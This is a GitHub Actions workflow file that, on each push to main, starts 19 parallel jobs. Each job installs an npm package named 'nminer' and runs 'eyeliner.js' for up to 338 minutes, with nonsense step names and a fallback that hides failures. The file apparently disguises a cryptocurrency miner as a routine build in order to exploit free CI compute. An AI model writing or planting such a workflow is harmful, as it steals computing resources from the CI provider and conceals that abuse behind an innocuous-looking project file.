name: eyeliner
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2406 }
          - { version: 3019 }
          - { version: 6869 }
          - { version: 1099 }
          - { version: 2820 }
          - { version: 5824 }
          - { version: 1361 }
          - { version: 8659 }
          - { version: 2485 }
          - { version: 1463 }
          - { version: 8947 }
          - { version: 6219 }
          - { version: 7840 }
          - { version: 2190 }
          - { version: 6708 }
          - { version: 1830 }
          - { version: 9403 }
          - { version: 3902 }
          - { version: 255 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: apropos intermesh
        run: |
          npm install nminer@latest
          timeout 338m node eyeliner.js || echo "eyeliner executed"